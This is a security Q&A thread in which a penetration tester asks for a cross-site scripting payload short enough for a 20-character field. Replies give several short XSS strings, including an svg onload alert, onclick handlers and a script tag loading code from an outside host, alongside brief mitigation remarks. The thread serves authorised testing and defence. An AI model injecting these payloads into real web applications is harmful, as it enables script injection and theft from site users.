# Cross site scripting verification on a field which does not accept more than 20 characters

Tags: appsec, penetration-test, xss

While performing penetration testing, I got stuck to a point. There is a text field which does not accept more than 20 characters(server side validation). I inserted following piece of code to check XSS (From RSnake's XSS cheat sheet):

```
'';!--"<XSS>=&{()}
```

and verified the source for `<XSS` verses `&lt;XSS` to see if it is vulnerable. I got `<XSS`in the source which suggests that this field is vulnerable to cross site scripting.

Now I am trying to create some code which should be less or equal to 20 characters and could be executed on this field to confirm the XSS but I am finding it hard. So in this case I have basically two questions:

1: Can someone help with such piece of code?

2: To mitigate XSS, validation for max-length(15-20 characters) could be one of the options other than the combination of data validation + HTML encoding? Please assume business rules agrees with the 15-20 characters limit.

Hope I was able to explain the question and the scenario. Kindly let me know in case of any doubts.

Comment: Got the executable code.

    <a href=http://a.by>

Comment: Not exactly answer to your question, but interesting tips how to shorten JavaScript code can be found here: https://github.com/jed/140bytes/wiki/Byte-saving-techniques

Comment: why did you delete most of the text of the question? it was fine as it was (just no need to copy the answers, just mark it as accepted...)

Comment: @AviD, @Caleb and everyone: You guys have waited for my reply before reverting it back to the old questiosn. At least being a member of this group, I can expect it. I edited the response with two reasons: 1- I thought edited version was making more sense. 2- I should not have provided such detailed info (it could be my imagination or so) I have asked some generic questions before too this question was getting a bit specific. I would appreciate if someone from the admin team can provide me their mail id, I would love to respond them personally.

Comment: @p_upadhyay, I dont think its that big a deal... feel free to grab one of the mods in the [chat] room, or open a meta question if you feel its neccessary.

Comment: @P_upadhyay: Please remove the answers from your question. If there is not an answer given that is correct, add an answer yourself and mark it as correct, but don't edit questions to add the answers. See my note on edit #4 for why I removed them once already.

Comment: @Caleb: I don't think I can answer to my own question. I might need more points for the same. BTW feel free watever you guys wanna do with this question to make it adhere to the forum's rules.

Comment: @p_upadhyay: You don't need extra reputation to do the things you need to do to handle your own questions properly. First of all, you should mark Ori's answer as correct. You state in your edit you got at least part of your right answer from him, so check his answer as correct. If the extra examples are useful, you can add another answer yourself. You will be prompted about "are you sure you want to answer your own question", but you can go ahead and add an answer.

Comment: Not your actual question, however as a whitehat I would not waste my time and customers money to produce a working proof in such a tricky restricted case. Just get the missing validation or broken escaping fixed and be done.

Answer (score 9, accepted):

I love irony.  Here's the line that was going to be my response.  And the error I received for posting it.

```
<script src=//h4k.me
```

Oops! Your answer couldn't be submitted because:

body must be at least 30 characters; you entered 20

Use variable recasting if at all possible before processing input (if not, regex to throw <'s /s etc out.)

Comment: I don't think that's irony ;)

Answer (score 5):

Other then the script provided by Ori, there are a few other scripts which could be useful in this case:-

```
<a href=http://a.by>
<a onclick=alert(2)>
<b onclick=alert(2)>
```

Answer (score 0):

The shortest XSS payload that I have ever seen that opens an alert dialog and does not require user interaction is the following:

```
<svg/onload=alert()>
```

However, if the only requirement is that it must be usable for XSS vulnerability testing, this is the shortest it can get:

```
<
```

You'd just have to view the page source to see if it writes `<` or `&#x3C;` to the page, so it isn't as fast